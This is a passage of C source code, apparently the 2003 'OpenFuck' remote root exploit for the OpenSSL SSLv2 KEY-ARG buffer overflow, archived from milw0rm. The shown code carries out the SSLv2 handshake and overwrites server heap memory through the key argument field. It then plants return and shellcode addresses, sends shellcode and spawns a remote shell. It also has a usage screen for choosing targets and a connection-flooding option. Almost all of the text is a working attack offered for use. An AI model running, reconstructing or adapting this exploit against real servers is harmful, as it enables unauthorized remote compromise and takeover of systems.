printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
exit(1);
}
/* The connection id is sent back to the server in the CLIENT FINISHED packet */
ssl->conn_id_length = conn_id_length;
memcpy(ssl->conn_id, p, conn_id_length);
}
/* Send a CLIENT MASTER KEY message to the server */
void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
int encrypted_key_length, key_arg_length, record_length;
unsigned char* p;
int i;
EVP_PKEY *pkey=NULL;
unsigned char buf[BUFSIZE] =
"\x02" /* client master key message */
"\x01\x00\x80" /* cipher kind */
"\x00\x00" /* clear key length */
"\x00\x40" /* encrypted key length */
"\x00\x08"; /* key arg length */
p = &buf[10];
/* generate a 128 byte master key */
for (i = 0; i < RC4_KEY_LENGTH; i++) {
ssl->master_key[i] = (unsigned char) (rand() >> 24);
}
pkey=X509_get_pubkey(ssl->x509);
if (!pkey) {
printf("send client master key: No public key in the server certificate\n");
exit(1);
}
if (pkey->type != EVP_PKEY_RSA) {
printf("send client master key: The public key in the server certificate is not a RSA key\n");
exit(1);
}
/* Encrypt the client master key with the server public key and put it in the packet */
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
if (encrypted_key_length <= 0) {
printf("send client master key: RSA encryption failure\n");
exit(1);
}
p += encrypted_key_length;
if (key_arg_overwrite) {
/* These 8 bytes fill the key arg array on the server */
for (i = 0; i < 8; i++) {
*(p++) = (unsigned char) (rand() >> 24);
}
/* This overwrites the data following the key arg array */
memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
key_arg_length = 8 + key_arg_overwrite_len;
}
else {
key_arg_length = 0; /* RC4 doesn't use KEY-ARG */
}
p = &buf[6];
s2n(encrypted_key_length, p);
s2n(key_arg_length, p);
record_length = 10 + encrypted_key_length + key_arg_length;
send_ssl_packet(ssl, buf, record_length);
ssl->encrypted = 1;
}
void generate_key_material(ssl_conn* ssl)
{
unsigned int i;
MD5_CTX ctx;
unsigned char *km;
unsigned char c='0';
km=ssl->key_material;
for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
MD5_Init(&ctx);
MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
MD5_Update(&ctx,&c,1);
c++;
MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
MD5_Final(km,&ctx);
km+=MD5_DIGEST_LENGTH;
}
}
void generate_session_keys(ssl_conn* ssl)
{
generate_key_material(ssl);
ssl->read_key = &(ssl->key_material[0]);
ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
}
void get_server_verify(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (len != 1 + CHALLENGE_LENGTH) {
printf("get server verify: Malformed packet size\n");
exit(1);
}
if (buf[0] != SSL2_MT_SERVER_VERIFY) {
printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]);
exit(1);
}
if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
printf("get server verify: Challenge strings don't match\n");
exit(1);
}
}
void send_client_finished(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
buf[0] = SSL2_MT_CLIENT_FINISHED;
memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
}
void get_server_finished(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
int i;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (buf[0] != SSL2_MT_SERVER_FINISHED) {
printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]);
exit(1);
}
if (len <= 112 /*17*/) {
printf("This server is not vulnerable to this attack.\n");
exit(1);
}
cipher = *(int*)&buf[101];
ciphers = *(int*)&buf[109];
printf("cipher: 0x%x ciphers: 0x%x\n", cipher, ciphers);
}
void get_server_error(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
exit(1);
}
}
void usage(char* argv0)
{
int i;
printf(": Usage: %s target box [port] [-c N]\n\n", argv0);
printf(" target - supported box eg: 0x00\n");
printf(" box - hostname or IP address\n");
printf(" port - port for ssl connection\n");
printf(" -c open N connections. (use range 40-50 if u dont know)\n");
printf(" \n\n");
printf(" Supported OffSet:\n");
for (i=0; i<=MAX_ARCH; i++) {
printf("\t0x%02x - %s\n", i, architectures[i].desc);
}
printf("\nFuck to all guys who like use lamah ddos. Read SRC to have no surprise\n");
exit(1);
}
int main(int argc, char* argv[])
{
char* host;
int port = 443;
int i;
int arch;
int N = 0;
ssl_conn* ssl1;
ssl_conn* ssl2;
printf("\n");
printf("*******************************************************************\n");
printf("* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *\n");
printf("*******************************************************************\n");
printf("* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *\n");
printf("* #hackarena irc.brasnet.org *\n");
printf("* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *\n");
printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n");
printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n");
printf("*******************************************************************\n");
printf("\n");
if ((argc < 3) || (argc > 6))
usage(argv[0]);
sscanf(argv[1], "0x%x", &arch);
if ((arch < 0) || (arch > MAX_ARCH))
usage(argv[0]);
host = argv[2];
if (argc == 4)
port = atoi(argv[3]);
else if (argc == 5) {
if (strcmp(argv[3], "-c"))
usage(argv[0]);
N = atoi(argv[4]);
}
else if (argc == 6) {
port = atoi(argv[3]);
if (strcmp(argv[4], "-c"))
usage(argv[0]);
N = atoi(argv[5]);
}
srand(0x31337);
for (i=0; i<N; i++) {
printf("\rConnection... %d of %d", i+1, N);
fflush(stdout);
connect_host(host, port);
usleep(100000);
}
if (N) printf("\n");
printf("Establishing SSL connection\n");
ssl1 = ssl_connect_host(host, port);
ssl2 = ssl_connect_host(host, port);
send_client_hello(ssl1);
get_server_hello(ssl1);
send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
generate_session_keys(ssl1);
get_server_verify(ssl1);
send_client_finished(ssl1);
get_server_finished(ssl1);
printf("Ready to send shellcode\n");
port = get_local_port(ssl2->sock);
overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
*(int*)&overwrite_next_chunk[156] = cipher;
*(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
*(int*)&overwrite_next_chunk[196] = ciphers + 16; /* shellcode address */
send_client_hello(ssl2);
get_server_hello(ssl2);
send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
generate_session_keys(ssl2);
get_server_verify(ssl2);
for (i = 0; i < ssl2->conn_id_length; i++) {
ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
}
send_client_finished(ssl2);
get_server_error(ssl2);
printf("Spawning shell...\n");
sleep(1);
sh(ssl2->sock);
close(ssl2->sock);
close(ssl1->sock);
return 0;
}
/* spabam: It isn't 0day */
// milw0rm.com [2003-04-04]
Reference in a new issue View git blame Copy permalink